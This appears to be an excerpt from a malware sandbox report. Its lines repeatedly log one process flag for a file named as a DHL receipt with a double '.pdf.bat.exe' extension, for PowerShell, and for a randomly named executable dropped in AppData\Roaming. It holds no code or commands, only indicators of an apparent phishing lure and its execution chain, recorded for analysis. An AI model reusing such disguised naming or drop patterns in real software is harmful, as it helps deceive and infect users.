Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
